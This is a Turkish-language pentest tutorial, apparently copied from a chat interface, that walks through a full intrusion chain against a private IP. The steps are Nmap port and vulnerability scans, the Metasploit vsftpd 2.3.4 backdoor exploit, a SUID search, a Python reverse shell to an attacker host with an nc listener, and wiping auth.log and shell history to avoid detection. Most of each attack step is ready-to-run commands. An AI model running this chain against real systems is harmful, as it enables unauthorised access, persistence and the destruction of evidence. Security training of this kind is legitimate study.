
📌 1. Bilgi Toplama (Reconnaissance)
Bu aşamada hedef hakkında bilgi toplanır. Örneğin, Nmap kullanarak bir sistemin açık portlarını tarayalım.
🔹 Nmap ile Açık Port Tarama (Aktif Bilgi Toplama)
bashKopyalaDüzenlenmap -sS -Pn -T4 -p- 192.168.1.1
Bu komut:
✅ SYN taraması yapar
✅ Tüm portları tarar
✅ Açık portları ve servisleri listeler
📌 2. Zafiyet Analizi
Açık portlardan birinde çalışan servislerde zafiyet olup olmadığını kontrol edelim.
🔹 Nmap ile Servis Tespiti ve Zafiyet Tarama
bashKopyalaDüzenlenmap -sV --script=vuln 192.168.1.1
Bu komut, hedef sistemde çalışan servisleri tespit eder ve varsa CVE açıklarını listeler.
📌 3. Exploitation (İstismar)
Hedefte bulunan bir FTP servisini (vsftpd 2.3.4) exploit etmek için Metasploit Framework kullanabiliriz.
🔹 Metasploit ile Exploit Çalıştırma
bashKopyalaDüzenlemsfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
exploit
Bu komut ile arka kapı (backdoor) açılır ve sisteme uzaktan bağlanma imkanı elde edilir.
📌 4. Yetki Yükseltme (Privilege Escalation)
Sisteme bağlandıktan sonra yetki yükseltme işlemi yapabiliriz.
🔹 Linux’ta SUID Biten Dosyaları Bulma (Yetki Yükseltme Öncesi)
bashKopyalaDüzenlefind / -perm -4000 2>/dev/null
Bu komut, SUID biti aktif olan dosyaları listeler. Örneğin, /bin/bash
dosyası varsa, root yetkisine sahip olabiliriz.
📌 5. Kalıcı Erişim Sağlama
Yetki yükselttikten sonra kalıcı erişim sağlamak için bir reverse shell açabiliriz.
🔹 Python ile Reverse Shell Bağlantısı
Hedef sisteme şu komutu çalıştırarak saldırganın sistemine bağlantı açabiliriz:
bashKopyalaDüzenlepython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Bunun için saldırgan tarafında nc dinleyici açmalıyız:
bashKopyalaDüzenlenc -lvp 4444
Bağlantı sağlandığında hacker, hedef makinede shell elde eder. ✅
📌 6. Logları Silme ve Raporlama
Tespit edilmemek için sistem loglarını temizleme işlemi yapılabilir.
🔹 Linux Log Temizleme
bashKopyalaDüzenleecho "" > /var/log/auth.log
history -c
Bu komut, yetkisiz erişim izlerini kaldırır.
📌 Akış Diyagramı
Pentest sürecinin temel akışını aşağıdaki gibi görselleştirebiliriz:
plaintextKopyalaDüzenle Başlangıç
|
▼
📡 Bilgi Toplama
(Nmap, Recon-ng)
|
▼
🔍 Zafiyet Tespiti
(Exploit-DB, CVE)
|
▼
💣 Exploitation
(Metasploit, RCE)
|
▼
🚀 Yetki Yükseltme
(Privilege Escalation)
|
▼
🔒 Kalıcı Erişim
(Reverse Shell)
|
▼
📊 Raporlama ve Log Temizleme
|
▼
Bitiş ✅